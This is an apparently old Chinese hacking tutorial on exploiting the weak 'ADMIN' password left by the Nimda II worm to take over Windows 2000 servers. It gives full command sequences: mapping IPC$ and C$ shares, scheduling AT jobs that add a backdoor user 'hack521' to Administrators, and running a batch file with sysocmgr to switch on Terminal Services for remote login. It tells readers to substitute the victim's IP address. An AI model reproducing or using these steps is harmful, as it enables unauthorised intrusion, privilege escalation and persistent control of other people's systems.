当前位置:首页 >

利用尼姆达II病毒提升自己为系统管理员


  在WINDOWS 2000的网络命令家族中,NET命令集和AT远程执行工具是最好的工具!
  
  目前,尼姆达II病毒仍然在互联网络上广为流传!
  
  我们就利用尼姆达II给我们带来的漏洞!
  
  结合NET命令集和AT远程执行工具把自己提升为系统管理员吧!
  
  首先,需要你的电脑上安装有Windows 2000 Server OR Professional
  
  其次,我们进入CMD(Windows 2000的命令提示符)
  
  (不知道如何进入命令提示符?)
  
  单击开始按钮,选择运行……,输入CMD,然后回车
  
  会看到一个窗口(DOS状态的)
  
  C:\>NET USE \\127.0.0.1\IPC$ "ADMIN" /USER:"ADMIN"
  命令成功完成
  C:\>NET USE X: \\127.0.0.1\C$
  命令成功完成
  C:\>NET TIME \\127.0.0.1 /SET
  是否与\\127.0.0.1的时间一致?[Y/N]Y
  命令成功完成
  C:\>AT \\127.0.0.1 18:00 C:\WINNT\SYSTEM32\NET.EXE USER hack521 123 /ADD
  计划成功添加 ID=1
  C:\>AT \\127.0.0.1 18:02 C:\WINNT\SYSTEM32\NET.EXE LOCALGROUP Administrators hack521 /ADD
  计划成功添加 ID=2
  
  OK 我来解释一下!
  
  127.0.0.1是你本地的IP地址(没有上网的时候),具体实战的时候替换成对方的网络IP!
  
  "ADMIN" /USER:"ADMIN" 这个是尼姆达II病毒制造的弱口令!权限为SYSTEM!
  
  NET TIME \\127.0.0.1 /SET 将本地时间与服务器时间同步!
  
  两行AT命令是分别在18:00与18:02执行服务器的两个NET命令
  
  前一个是创建一个用户,后面的是将用户提升为系统管理员
  
  这样,我们以后就可以用hack521这个用户访问这台服务器了!
  
  黑客的目的不仅仅是要提升自己为系统管理员而已,还要完全控制整台服务器!
  
  我们仍然在命令提示符下面(CMD状态)
  
  C:\>COPY CON hack.bat
  @ECHO TSEnable = on > C:\sql^Z
  1 个文件拷贝完成
  C:\>COPY hack.bat X:1 个文件拷贝完成
  C:\>AT \\127.0.0.1 18:30 C:\hack.bat
  计划成功添加 ID=1
  C:\>AT \\127.0.0.1 18:32 C:\WINNT\SYSTEM32\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
  计划成功添加 ID=1
  c:\>
  
  OK 我来解释一下!
  
  COPY CON hack.bat是创建一个批处理,输入命令的时候一定要小心,错了就得重新来一遍!
  
  (如果notepad使用熟练的话,可以使用notepad编辑)
  
  X:是映射的本地驱动器,盘符是自己定义的(不与本地驱动器同名即可)
  
  两行AT命令是分别在18:30与18:32执行服务器的两个外部程序
  
  前一个是执行我们创建的那个批处理程序,后面的是调用系统服务管理,启动远程管理功能
  
  执行后,你不要着急连接远程管理功能,因为服务器正在重新启动中,得等一段时间!
  
  大约5-6分钟以后,就可以使用了!
  
  使用WinCtrl软件(关于WinCtrl的使用方法,看软件的帮助)连接上服务器!
  
  当看到登录屏幕的时候,使用刚才创建的hack521用户登录吧!
  
  
最热门文章推荐:
网站推广文章
网站推广心得
跑跑卡丁车教程
跑跑卡丁车连喷教程
网站制作工具
制作网站的软件
opengl是什么
cs不支持opengl
 ↓相关文章:
© 2006-2008 All Rights Reserved